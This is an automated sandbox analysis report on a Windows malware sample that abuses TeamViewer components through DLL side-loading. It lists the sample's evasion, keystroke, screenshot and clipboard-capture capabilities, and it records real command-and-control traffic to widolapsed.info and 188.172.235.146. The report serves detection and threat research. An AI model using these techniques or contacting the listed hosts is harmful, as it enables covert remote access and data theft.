Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name: wogZe27GBB.exe
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned
Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe Virustotal: Detection: 53%
Source: wogZe27GBB.exe ReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll ReversingLabs: Detection: 51%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.wogZe27GBB.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B32E __EH_prolog3,CryptGenRandom, 5_2_0049B32E
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA, 5_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_006F605B CryptReleaseContext, 5_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose, 0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA, 0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 3_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 3_2_6E5C2960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose, 5_2_6E5C2EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose, 5_2_6E5C2960

Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86008Content-Type: multipart/form-data; boundary=--------2871961252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85958Content-Type: multipart/form-data; boundary=--------2035396243User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp String found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp String found in binary or memory: http://crl.verisign.co
